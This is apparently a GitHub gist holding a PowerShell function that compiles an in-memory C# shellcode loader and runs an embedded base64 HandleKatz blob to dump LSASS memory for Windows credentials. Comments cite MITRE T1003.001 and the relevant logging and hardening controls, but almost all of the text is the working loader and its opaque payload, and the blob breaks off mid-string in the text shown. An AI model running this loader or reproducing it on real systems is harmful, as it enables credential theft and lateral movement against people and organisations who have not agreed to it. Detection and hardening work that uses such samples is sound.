@S3cur3Th1sSh1t
Last active October 1, 2022 16:58
function Invoke-HandleKatzInject
{
<#
.SYNOPSIS
Compiles an embedded C# loader at runtime and calls the HandleKatz blob inside the current PowerShell process.
.DESCRIPTION
Execute Handlekatz Shellcode to dump lsass.
Main Credits to https://github.com/codewhitesec/HandleKatz
Author: @ShitSecure
.PARAMETER recon
Passed through unchanged as the first (reconOnly) argument of the native entry point.
Presumably limits the run to enumeration without writing a dump - confirm against the upstream project.
.PARAMETER DumpPath
Passed through as the path argument of the native entry point. Defaults to an empty string.
.PARAMETER handlePid
Passed through as the pID argument. Declared as a string; PowerShell converts it to uint at the call.
The meaning of the default "0" is defined by the blob, not by this wrapper.
.NOTES
Reading LSASS memory for credentials is catalogued as MITRE ATT&CK T1003.001.
Everything this wrapper does before the native call is visible to standard telemetry:
the full function text (including the base64 literal) is recorded by PowerShell script block
logging (event ID 4104) and is presented to AMSI, and the runtime compilation step is observable
on its own. LSA protection (RunAsPPL), Credential Guard and the attack surface reduction rule for
LSASS credential theft are the usual hardening controls for this technique.
#>
Param
(
# Forwarded as-is to the native entry point (reconOnly).
[bool]
$recon = $false,
# Output location handed to the native code; not validated here.
[string]
$DumpPath = "",
# Kept as a string here; a non-numeric value fails at the uint conversion when Inject is called.
[string]
$handlePid = "0"
)
$HandleKatzInject = @"
using System;
using System.Runtime.InteropServices;
using System.Text;
namespace HandleKatzInject
{
public class Program
{
// kernel32 VirtualProtect. The first parameter is named hProcess in this declaration, but the
// Win32 function takes the region address in that position, and the only call site passes the
// buffer pointer there. The name is misleading; the position is what the API sees.
[DllImport("kernel32.dll")]
static extern bool VirtualProtect(IntPtr hProcess, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
// kernel32 VirtualAllocEx. Declared but not called anywhere in the visible loader code.
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
// Managed signature used to call into the decoded blob (stdcall, ANSI string marshalling).
// The StringBuilder is marshalled as a caller-allocated character buffer for the callee to fill.
[UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Ansi)]
public delegate uint HandleDelegate(bool reconOnly, IntPtr path, uint pID, StringBuilder output);
/// <summary>
/// Decodes the embedded base64 blob, copies it into unmanaged memory, marks that memory
/// executable, and calls it through <c>HandleDelegate</c> on the current thread.
/// The text the callee writes to its output buffer is printed to the console.
/// </summary>
/// <param name="recon">Forwarded as the callee's reconOnly flag.</param>
/// <param name="path">Converted to ASCII bytes and handed to the callee as a raw pointer.</param>
/// <param name="pID">Forwarded to the callee unchanged.</param>
public static void Inject(bool recon, string path, uint pID)
{
// HandleKatz.bin base64 encoded - https://github.com/codewhitesec/HandleKatz
// NOTE(review): the literal below is an opaque binary from the point of view of this file.
// No hash or build recipe accompanies it, so it cannot be matched to the upstream project
// from this page alone; treat it as untrusted code when triaging.
string base64Katz = "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
